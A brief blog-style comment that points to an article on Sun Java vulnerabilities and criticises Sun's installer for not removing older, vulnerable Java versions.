Another article that deals with this situation, authored by MS-MVP Sandi Hardmeier, can be viewed here : Sun Java Vulnerabilities continue

How hard is it to code the installer to uninstall older, vulnerable Java versions? In the world according to Sun, it's seemingly impossible.